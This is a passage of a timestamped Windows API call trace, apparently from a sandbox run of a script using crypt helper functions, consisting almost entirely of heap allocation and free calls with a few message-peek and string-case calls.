RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.382] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1801b) returned 0xac0018 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0039.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0039.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0039.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0039.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1801b) returned 0x94d030 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.384] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.385] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd60 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.385] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.386] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.388] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.388] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0039.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0039.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: 